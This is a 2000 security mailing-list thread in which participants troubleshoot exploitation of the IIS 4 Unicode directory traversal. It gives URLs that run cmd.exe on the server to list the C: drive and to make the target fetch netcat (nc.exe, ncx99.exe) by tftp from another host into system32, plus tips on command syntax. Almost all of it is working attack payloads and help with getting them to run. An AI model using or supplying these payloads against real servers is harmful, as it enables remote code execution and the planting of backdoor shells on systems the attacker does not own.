Re: dos commands via iis 4 (TFTP)

[booboo <booboo () 65535 COM>]

you can also normally swap the - with a / as in netstat+"-a" or netstat+/a

BooBoo

On Fri, 10 Nov 2000, Loschiavo, Dave wrote:

> Thanks, looks like I inadvertantly left the "get" out of the message. I was
> including that in the URL when testing. However, what I did notice was the
> use of the quotes in the "-i" area of the URL. I was not using quotes. Will
> have to give that a shot.
>
> -thanks
>
> -----Original Message-----
> From: Robert A. Seace
> To: DLoschiavo () frcc cc ca us
> Cc: VULN-DEV () SECURITYFOCUS COM
> Sent: 11/10/00 10:11 AM
> Subject: Re: dos commands via iis 4 (TFTP)
>
> In the profound words of Loschiavo, Dave:
> > I tried tftp commands in the URL, formatted like this:
> http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
> 32/c
> > md.exe?/tftp+-i+192.168.1.20+nc.exe"
> >
> > and got nowhere, while this:
> http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
> 32/c
> > md.exe?/c+dir+c: gave me a listing of the of the c: drive.
> >
> > Am I formatting the "TFTP" URL incorrectly?
>
>       Yeah, I think so...  But, I'm no TFTP guru, either...
> Personally, I would just use RCP...
>
>       However, looking at the original advisory on BugTraq, that
> mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048";),
> I think you need a "GET" before the "nc.exe", and maybe a destination
> location specified after it, for where to place it on the NT box...
> For instance, it shows an URL of:
>
> /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n
> cx99.exe+c:\winnt\system32\ncx99.exe